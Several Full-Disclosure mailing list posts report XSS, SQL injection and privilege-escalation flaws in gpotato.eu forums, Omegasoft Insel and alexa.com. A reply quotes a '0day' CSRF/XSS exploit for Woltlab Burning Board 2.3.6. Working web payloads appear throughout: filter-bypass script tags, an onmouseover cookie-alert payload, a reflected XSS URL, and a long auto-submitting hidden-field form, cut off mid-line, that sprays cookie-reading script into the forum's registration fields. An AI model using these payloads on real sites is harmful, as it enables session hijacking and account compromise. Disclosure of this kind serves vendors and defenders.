[Full-disclosure] persistant XSS, Manipulation of Data and privileg escalation in gpotato.eu forums
Hi all, the forums of gpotato.eu is prone to multiple different vulnerabilities. Timeline for XSS: 14. May: notified gpotato.eu stating, that there are security wholes in their forum I could use to steal login-information 15. May: response: there is no bug in the forum, and as the login information is encrypted, there is no problem 15. May: sending example: scrscriptiptalert(document.cookie);/scr/scriptipt 16. May: response: Ok, there was a bug when User has IE (bullshit, but example code doesn't work anymore) 16. May: sent next example: p onmouseover='alert(document.cookie);'blabla/p no more response. It doesn't work this way anymore, but my code is still sent to the site and only gets enclosed as title=mycode. Still might be vulnearble. I don't have a timeline for manipulation and escalation, but I told them several times now. It was possible, to reply to closed threads, which seems to be fixed now. But for the same time, they know, anyone (logged in) can edit anybody's postings, which is still unfixed. http://t*nyurl.com/5ovmr7 regards MC.Iglo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] static XSS / SQL-Injection in Omegasoft Insel
Input passed to fields in OmegaMw7's tables isn't properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site and/or inject SQL-Commands This applies to many many standard fields in different tables e.g. F05003, F05005, F05015 and to all user-created text fields using the form creator (you cannot do it a different way) kind regards MC.Iglo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] alexa.com XSS
http://thumbnails.alexa.com/update_thumbnail?url=%3Cscript%3Ealert(%22alexa%20sucks%22)%3C/script%3E is there more to say? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] alexa.com XSS
this means, they fixed it pretty fast. ok, it isn't that difficult ^^ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day
On my WBB 2.3.3 (and i think, this is the default setting) you cannot access register.php when logged in (even as admin). So you need to be logged off to open the evil site. And when you are logged off, the cookie is simply useless. Also, on my Forum, only r_dateformat and r_timeformat are affected. regards 2007/3/2, SaMuschie [EMAIL PROTECTED]: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 +--- - -- - | SaMuschie Research Labs proudly presents . . . +--- -- - - | Application: Woltlab Burning Board (wbb) | Version: 2.3.6 (others not testet) | Vuln./Exploit Type: CSRF/XSS | Status: 0day +- -- - - | Discovered by: Samenspender | Released: 20070302 | SaMuschie Release Number: 5 +--- - -- - CSRF/XSS Exploit: cat EOF wetpussy.html form name='evilform' method='POST' action='http://victimhost/wbb2/register.php' input type=hidden name=r_username value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_email value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_password value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_confirmpassword value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=key_string value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=key_number value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_homepage value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_icq value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_aim value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_yim value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_msn value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_day value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_month value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_year value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_gender value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_signature value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=disablesmilies value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=disablebbcode value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=disableimages value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_usertext value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=field%5B1%5D value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=field%5B2%5D value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=field%5B3%5D value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_invisible value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_usecookies value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_admincanemail value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_showemail value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_usercanemail value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_emailnotify value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_notificationperpm value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_receivepm value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_emailonpm value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_pmpopup value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_showsignatures value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_showavatars value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_showimages value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_daysprune value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_umaxposts value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_threadview value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_dateformat value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_timeformat value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_startweek value='scriptalert(Cookie: +